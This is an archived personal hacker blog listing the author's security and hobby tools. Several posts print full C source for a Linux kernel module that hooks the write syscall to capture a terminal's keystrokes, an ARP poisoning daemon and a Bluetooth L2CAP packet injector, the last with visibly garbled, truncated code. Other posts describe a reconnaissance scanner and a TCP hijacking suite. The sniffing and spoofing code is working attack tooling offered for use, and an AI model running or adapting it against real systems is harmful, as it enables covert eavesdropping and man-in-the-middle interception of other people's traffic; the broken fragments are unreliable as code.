Datenterrorist
"Macht ist die Hölle auf Erden" - Astrid Lindgren _

.:: pcap-diff ::.

"Diff two or more pcap files and write a pcap file with different packets as result"
Click
20.03.13 10:31:07 - balle - 860 comments - Source Code


.:: Pauk Cards ::.

Pauk Cards is a tiny script I wrote that let you convert a CSV file to an XML lesson file understood by MiniPauker.
Click
04.11.11 22:11:43 - balle - 641 comments - Source Code


.:: Chaosmap 1.3 ::.

Chaosmap is an information gathering tool and dns / whois / web server scanner written in Python.
It can be used to lookup DNS names with a dictionary with or without using a salt. Salting for DNS means it will append numbers from 1-9 to the name in the dictionary with or without a - and _ or a leading 0. Salting for Web stuff will try double slashes and some directory traversal tricks.
You can do reverse dns lookups of a whole ip range (with optional whois lookup) or make a dictionary scan for hidden paths on one webserver or a range of ip addresses. Optionally you can encode the path with url encoding and with google dict lookup mode chaosmap will first try to find the path on Google and only query the webserver if google has no search result. Last but not least it can be used to extract email addresses from domains using a Google search or perform a list of Google Hacking queries on your domain.
Click
Git repository

Changes between 1.2 and 1.3
- backup file bruteforce mode
14.03.11 22:20:00 - balle - 133 comments - Source Code


.:: Bierwuerfel - Weil Chaos Spass macht :) ::.

Anfangs haben wir die 120 Sorten Bier im Freiburger Bierhaus noch mit zwei normalen Würfeln erwürfelt, doch nach dem 4. Bier weiss man dann die ganzen Zahlen nicht mehr und so kam es wie es kommen musste!
Ich hab dafür ne Java Applikation fürs Handy geschrieben. Klar... Wozu is man Programmierer ^^
Der Bierwürfel merkt sich nicht nur was man getrunken hat, man kann ihm auch sagen was einem nicht geschmeckt hat und das wird dann nicht mehr erwürfelt. Nebenbei kann man noch die Augenzahl konfigurieren, so dass man ihn auch in Kneipen mit weniger Bierauswahl einsetzen kann.
Wer mitwürfeln möchte, braucht sich lediglich dieses JAR File aufs Handy zu laden.
Du kannst Java und möchtest dem Bierwürfel gern selbst noch nen neues Feature verpassen?
Kein Problem hier ist der Source Code.
HF && Prost! *g*
15.03.08 18:13:28 - balle - 787 comments - Source Code


.:: Bluediving 0.9 ::.

Hi there and greets from 24th Chaos Communication Congress.
Here’s a new release of Bluediving – The next generation Bluetooth security tool.
What’s new in 0.9?

- minor tools compile bugfixes by fireangel148
- minor compile bugfixes by niekt
- minor menu management / sound check bugfix by niekt
- make_tools.sh now compiles redfang
- Bugfixes in loop mode
- Scan for specific device type

Click && HF
27.12.07 13:40:00 - balle - 678 comments - Source Code


.:: Chaosagent 0.7 ::.

Der Chaosagent steht ihnen zu Diensten.
Egal ob Sie Suchergebnisse über Yahoo automatisieren möchten, keine Lust haben aus ihren RSS Feeds selbst das wichtigste raus zu suchen oder nur mal kurz wissen wollen wie draussen das Wetter ist, der Agent wird Ihnen diese Arbeit abnehmen und Ihnen wahlweise per Text oder Sprachausgabe antworten.
Als I-Tüpfelchen baut er auf Wunsch aus den gefilterten RSS News ihren persönlichen Feed zusammen.
Zur Sprachausgabe wird festival benötigt.
Click

Changelog für 0.7:
* Suchergebnisse können jetzt als RSS Feed ausgegeben werden


21.11.07 23:35:00 - balle - 1381 comments - Source Code


.:: L2CAP packetgenerator ::.

/*
* L2CAP packetgenerator
*
* By Bastian Ballmann
* http://www.datenterrorist.de
* Last update: 04.02.2007
*
* Some code borrowed from bss - thx 2 Pierre
*
* License: GPLv3
*/

// Includes
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <bluetooth/l2cap.h>




// Functions
void usage(void);

// MAIN PART
int main(int argc, char *argv[])
{
l2cap_cmd_hdr *cmd; // struct detailed in kernel_source/include/net/bluetooth/l2cap.h
struct sockaddr_l2 laddr, raddr;
struct hci_dev_info di;
char *buf, *remote_address = NULL;
char dummy_payload[] = "greets from ccc easterhegg 2007";
char *payload = dummy_payload;
int sock, c, i;
int l2_code = 0x08;
int l2_ident = 23;
int l2_hsize = 42;

// Get params
while ((c = getopt (argc, argv, "a:c:i:p:s:")) != -1)
{
switch (c)
{
case 'a':
remote_address = optarg;
break;

case 'c':
l2_code = atoi(optarg);
break;

case 'i':
l2_ident = atoi(optarg);
break;

case 'p':
payload = (char *)optarg;
break;

case 's':
l2_hsize = atoi(optarg);
break;

default:
usage();
break;
}
}

if(remote_address == NULL)
{
printf(">>> I need at least a remote btaddr...\n\n");
usage();
exit(EXIT_FAILURE);
}

if(l2_hsize == 42)
{
l2_hsize = strlen(payload);
}

// Get local device info
if(hci_devinfo(0, &di) code = l2_code;
cmd->ident = l2_ident;
cmd->len = htobs(l2_hsize);

/* Copy payload after l2cap header */
strncpy((buf + L2CAP_CMD_HDR_SIZE), payload, strlen(payload));

/* Throw the packet into the air */
if(send(sock, buf, L2CAP_CMD_HDR_SIZE + strlen(payload), 0) -c -i -p -s \n");
printf("L2CAP command codes:\n");
printf("L2CAP_COMMAND_REJ 0x01\n");
printf("L2CAP_CONN_REQ 0x02\n");
printf("L2CAP_CONN_RSP 0x03\n");
printf("L2CAP_CONF_REQ 0x04\n");
printf("L2CAP_CONF_RSP 0x05\n");
printf("L2CAP_DISCONN_REQ 0x06\n");
printf("L2CAP_DISCONN_RSP 0x07\n");
printf("L2CAP_ECHO_REQ 0x08\n");
printf("L2CAP_ECHO_RSP 0x09\n");
printf("L2CAP_INFO_REQ 0x0a\n");
printf("L2CAP_INFO_RSP 0x0b\n");
exit(EXIT_SUCCESS);
}
07.07.07 14:01:00 - balle - 1074 comments - Source Code


.:: Loginwatcher ::.

Loginwatcher ist ein kleines Perl Script, das im Hintergrund läuft und via Festival Logins / Logouts meldet.
Click
01.07.06 00:21:05 - balle - 1032 comments - Source Code


.:: Blinken Bluetooth ::.

Die Blinken Bluetooth Installation auf dem 22C3 sorgt dafür, dass Bluetooth Devices abhängig von ihrem Device Namen und Type Blinkenmovies abspielen. Desweiteren lösen Bluetooth Events wie l2ping oder iscan Animationen aus. Es gibt noch einen zu 99% fertigen OBEX Server mit dem man Nachrichten per Vcard einsenden kann (es fehlt nur die Ermittlung des Dateinamen der eingesendeten Datei).
Den Source Code des Projects gibt es nun auf der Chaostal Project Seite
30.12.05 13:49:37 - balle - 630 comments - Source Code


.:: P.A.T.H. - Perl Advanced TCP Hijacking ::.

P.A.T.H. (Perl Advanced TCP Hijacking) consists of a packetgenerator (constructing TCP/IP, UDP/IP, ICMP and ARP packets), a RST daemon (to reset TCP connections), a sniffer (with special mail and telnet modes), an ICMP redirection tool (to implement man-in-the-middle attacks with icmp redirect messages), an ARP redirection tool, an IDS testing tool and an automatic hijacking daemon for plain protocols (like telnet).
Click
02.04.05 14:20:00 - balle - 937 comments - Source Code


.:: GPGlist ::.

GPGlist is used in alias files like in sendmail or postfix and possibly other MTAs to implement GPG encrypted mailing lists.
It's based on the code of Francisco Jesus Monserrat Coll.
But it's a complete rewrite from scratch!
It uses one XML config file to store information about lists, it backups mails if an error occours and sends out error mails to the sender of the mail, you can decide if a list only excepts encrypted mails and it's imho easier to debug and implement as the gpgalias code.
Click
29.01.05 15:39:15 - balle - 1006 comments - Source Code


.:: NewsGrab ::.

Mit NewsGrab kann man schnell viele Newsgroups nach unterschiedlichen Artikeln durch suchen, bestimmte Arikel überwachen und deren Message ID, Header ausgeben, einfache Statistiken generieren oder einfach nur einen Artikel anhand seiner Message ID downloaden. NewsGrab wird flexibel über eine XML Datei configuriert und unterstützt mehrere Suchbegriffe pro Newsgroup, die auch reguläre Ausdrücke enthalten dürfen. Außerdem kann man mehrere Newsserver (mit oder ohne Authentification) verwenden, falls einer mal offline sein sollte.
click
13.10.04 18:55:00 - balle - 111 comments - Source Code


.:: Blue-CMD Hotplug ::.

Suran vom CCC Freiburg hat mein blue-cmd Script als Hotplug Script umgeschrieben.
Hotplug Script
Cron Scan Script
TGZ Archiv
16.09.04 19:16:58 - balle - 1348 comments - Source Code


.:: TTY Sniffer for Linux 2.4 ::.

A simple LKM to sniff a TTY. The TTY to sniff will be configured in /proc/ttysniff and the data can be read from the device /dev/ttysniff (mknod /dev/ttysniff c 40 0).


/*
Just a simple TTY sniffing LKM for Linux 2.4
TTY to sniff can be configured via /proc/ttysniff/*
(default is major 4 minor 2)
TTY data can be read from the device /dev/ttysniff
(use the tool watchtty to do so)
Device must exist (mknod /dev/ttysniff c 40 0)

Programmed by Bastian Ballmann
http://www.datenterrorist.de
30.06.2004

Compile with gcc -I/usr/src/linux/include -c ttysniff.c
Run with insmod ttysniff.o

This program is free software; you can redistribute
it and/or modify it under the terms of the
GNU General Public License version 2 as published
by the Free Software Foundation.

This program is distributed in the hope that it will
be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
*/

#define __KERNEL__
#define MODULE
#define PROCHOOK_H

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/mm.h>
#include <linux/fs.h>
#include <linux/proc_fs.h>
#include <sys/syscall.h>
#include <asm/uaccess.h>


EXPORT_NO_SYMBOLS;
MODULE_LICENSE("GPL");

/* Syscall stuff */
extern void *sys_call_table[];
int (*old_write)(int, const void *, size_t);
int new_write(int, const void *, size_t);

/* TTY */
#define TTYSIZE 4
char tty_minor[TTYSIZE] = {0};
char tty_major[TTYSIZE] = {0};

/* Ring buffer to store input */
#define BUFSIZE 4096
char buffer[BUFSIZE] = {0};
int buf_in = 0;
int buf_out = 0;

/* Proc stuff */
struct proc_dir_entry *proc_dir;
struct proc_dir_entry *proc_minor;
struct proc_dir_entry *proc_major;
int proc_read_minor(char *, char **, off_t, int, int *, void *);
int proc_write_minor(struct file *, const char *, unsigned long, void *);
int proc_read_major(char *, char **, off_t, int, int *, void *);
int proc_write_major(struct file *, const char *, unsigned long, void *);

/* Device stuff */
static int dev_open(struct inode *, struct file *);
static int dev_close(struct inode *, struct file *);
static int dev_read(struct file *, char *, size_t, loff_t *);

static struct file_operations fops =
{
owner: THIS_MODULE,
read: dev_read,
open: dev_open,
release: dev_close,
};


/************************************************************************
MAIN PART
************************************************************************/

/* Initialization */
int init_module(void)
{
/* Default TTY */
tty_major[0] = '4';
tty_minor[0] = '2';

/* Create proc dir */
proc_dir = proc_mkdir("ttysniff", &proc_root);

/* Create proc files */
if(proc_dir)
{
proc_major = create_proc_entry("major", 0600, proc_dir);
proc_major->owner = THIS_MODULE;
proc_major->write_proc = proc_write_major;
proc_major->read_proc = proc_read_major;

proc_minor = create_proc_entry("minor", 0600, proc_dir);
proc_minor->owner = THIS_MODULE;
proc_minor->write_proc = proc_write_minor;
proc_minor->read_proc = proc_read_minor;
}

/* Register device */
if(register_chrdev(40, "ttysniff", &fops))
return -EIO;

/* Overwrite write syscall */
old_write = sys_call_table[__NR_write];
sys_call_table[__NR_write] = new_write;

return 0;
}

/* Cleanup */
void cleanup_module(void)
{
/* Remove proc dir */
remove_proc_entry(proc_dir->name, &proc_root);

/* Unregister device */
unregister_chrdev(40, "ttysniff");

/* Restore write syscall */
sys_call_table[__NR_write] = old_write;
}


/************************************************************************
Syscalls
************************************************************************/

/*
New write() syscall
Invoke the old write() syscall
Test if data is writen to the device we should monitor
Copy data to our ring buffer if so
*/
int new_write(int fd, const void *buf, size_t count)
{
/* Get the inode of the filehandle */
struct file *file = (struct file *)fget(fd);
struct dentry *dentry = (struct dentry *)file->f_dentry;
struct inode *inode = (struct inode *)dentry->d_inode;

/* Invoke the old write() syscall */
int bytes_read = old_write(fd,buf,count);

/* Is this the TTY we shall sniff input from? */
if( (major(inode->i_rdev) == simple_strtol(tty_major,NULL,0)) &&
(minor(inode->i_rdev) == simple_strtol(tty_minor,NULL,0)) )
{
/* Copy the userland buffer byte by byte into our ring buffer */
while(count)
{
if(buf_in > BUFSIZE-1)
buf_in = 0;

get_user(buffer[buf_in++], (char*)buf++);
count--;
}
}

fput(file);
return bytes_read;
}


/************************************************************************
Proc
************************************************************************/

/* Read major number */
int proc_read_major(char *buf, char **start, off_t offset, int count, int *eof, void *data)
{
return sprintf(buf,"%s\n",tty_major);;
}

/* Write major number */
int proc_write_major(struct file *file, const char *buf, unsigned long count, void *data)
{
memset(tty_major,'',TTYSIZE);
strncpy(tty_major,buf,count);
return strlen(buf);
}

/* Read minor number */
int proc_read_minor(char *buf, char **start, off_t offset, int count, int *eof, void *data)
{
return snprintf(buf,count,"%s\n",tty_minor);;
}

/* Write minor number */
int proc_write_minor(struct file *file, const char *buf, unsigned long count, void *data)
{
memset(tty_minor,'',TTYSIZE);
strncpy(tty_minor,buf,count);
return strlen(buf);
}


/************************************************************************
Device
************************************************************************/

/* Open the device */
static int dev_open(struct inode *i, struct file *f)
{
if(current->euid != 0)
return -1;

MOD_INC_USE_COUNT;
return 0;
}

/* Close the device */
static int dev_close(struct inode *i, struct file *f)
{
MOD_DEC_USE_COUNT;
return 0;
}

/* Read from device */
static int dev_read(struct file *file, char *buf, size_t count, loff_t *pos)
{
int bytes_read = 0;

/* No new input? */
if(buf_out == buf_in)
return 0;

if(buffer[buf_out] == 0)
return 0;

/* Copy the ring buffer to the userland buffer */
while(count && buffer[buf_out])
{
put_user(buffer[buf_out++], buf++);
count--;
bytes_read++;

if(buf_out > BUFSIZE-1)
{
buf_out = 0;
break;
}
}

return bytes_read;
}
// EOF

/*
Simple program to read input from /dev/ttysniff
Programmed by Bastian Ballmann
http://www.datenterrorist.de
30.06.2004

This program is free software; you can redistribute
it and/or modify it under the terms of the
GNU General Public License version 2 as published
by the Free Software Foundation.

This program is distributed in the hope that it will
be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
*/

#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>


int main(void)
{
char c;

/* open device */
int fd = open("/dev/ttysniff",O_RDONLY);

if(fd == -1)
{
perror("open /dev/ttyhijack");
exit(1);
}

/* Unbuffered output */
setvbuf(stdout, NULL, _IONBF, 0);

/* Read input and write it to stdout */
while(1)
{
if(read(fd,&c,1) > 0)
putchar(c);
else
usleep(1);
}

close(fd);
return 0;
}

// [EOF]


30.06.04 14:18:00 - balle - 119 comments - Source Code


.:: ARP spoofing ::.

/*

A simple ARP poisoning daemon,


Programmed by Bastian Ballmann

Last update: 06.06.2004

http://www.datenterrorist.de

*/


#include <sys/ioctl.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <net/ethernet.h>

#include <net/if.h>


#define ARPOP_REPLY 2

#define ARPHDR_ETHER 1

#define ETH_ALEN 6

#define IP_ALEN 4


// ARP Header Struktur

struct arphdr

{

u_short hw_type; // hardware type

u_short proto_type; // protocol type

char ha_len; // hardware address length

char pa_len; // protocol address length

u_short opcode; // arp opcode

unsigned char source_add[ETH_ALEN]; // source mac

unsigned char source_ip[IP_ALEN]; // source ip

unsigned char dest_add[ETH_ALEN]; // destination mac

unsigned char dest_ip[IP_ALEN]; // destination ip

};



int main(int argc, char *argv[])

{

int r_sock, w_sock;

int packetsize = sizeof(struct ether_header) + sizeof(struct arphdr);

char packet[packetsize];

struct ether_header *eth = (struct ether_header *) packet;

struct arphdr *arp = (struct arphdr *)(packet + sizeof(struct ether_header));

unsigned char arppacket[sizeof(struct arphdr) + sizeof(struct ether_header)];

struct ether_header *spoof_eth = (struct ether_header *)arppacket;

struct arphdr *spoof_arp = (struct arphdr *)(arppacket + sizeof(struct ether_header));

struct sockaddr addr;

int one = 1;

struct ifreq iface;

char smac[ETH_ALEN];


if(argc < 2)

{

printf("%s <device>\n", argv[0]);

exit(1);

}


// Are you root?

if(getuid() != 0)

{

printf("You must be root\n");

exit(1);

}


// Raw Socket to read

if((r_sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ARP))) < 0)

{

perror("socket");

exit(1);

}


// Raw Socket to write

if((w_sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ARP))) < 0)

{

perror("socket");

exit(1);

}


// Read MAC Address

strcpy(iface.ifr_name, argv[1]);


if((ioctl(r_sock, SIOCGIFHWADDR, &iface)) < 0)

{

perror("ioctl SIOCGIFHWADDR");

exit(1);

}

else

{

sprintf(smac,"%02x:%02x:%02x:%02x:%02x:%02x",

iface.ifr_hwaddr.sa_data[0] & 0xff,

iface.ifr_hwaddr.sa_data[1] & 0xff,

iface.ifr_hwaddr.sa_data[2] & 0xff,

iface.ifr_hwaddr.sa_data[3] & 0xff,

iface.ifr_hwaddr.sa_data[4] & 0xff,

iface.ifr_hwaddr.sa_data[5] & 0xff);

}


// Wait for ARP requests and send ARP replies

while(1)

{

read(r_sock,packet,packetsize);


// Is that packet an ARP request?

if((eth->ether_type == 1544) && (arp->opcode == 256))

{

// Ethernet Header

memcpy(spoof_eth->ether_dhost, eth->ether_shost, ETH_ALEN); // Destination MAC

memcpy(spoof_eth->ether_shost, smac, ETH_ALEN); // Source MAC

spoof_eth->ether_type = htons(ETHERTYPE_ARP); // Packet type


// ARP Header

spoof_arp->hw_type = htons(ARPHDR_ETHER); // Hardware address type

spoof_arp->proto_type = htons(ETH_P_IP); // Protocol address type

spoof_arp->ha_len = ETH_ALEN; // Hardware address length

spoof_arp->pa_len = IP_ALEN; // Protocol address length

spoof_arp->opcode = htons(ARPOP_REPLY); // ARP operation type

memcpy(spoof_arp->source_add, (char*)ether_aton(smac), ETH_ALEN); // Sender MAC

memcpy(spoof_arp->source_ip, arp->dest_ip, IP_ALEN); // Source IP

memcpy(spoof_arp->dest_add, arp->source_add, ETH_ALEN); // Target MAC

memcpy(spoof_arp->dest_ip, arp->source_ip, IP_ALEN); // Target IP


// Run packet! Run!


strncpy(addr.sa_data, argv[1], sizeof(addr.sa_data));

printf("arp reply %s is at %s\n", inet_ntoa(*(struct in_addr*)&spoof_arp->source_ip), smac);


if(sendto(w_sock, arppacket, packetsize, 0, &addr, sizeof(addr)) < 0)

{

perror("send");

exit(1);

}

}

}


close(r_sock);

close(w_sock);

return 0;

}


06.06.04 14:19:00 - balle - 740 comments - Source Code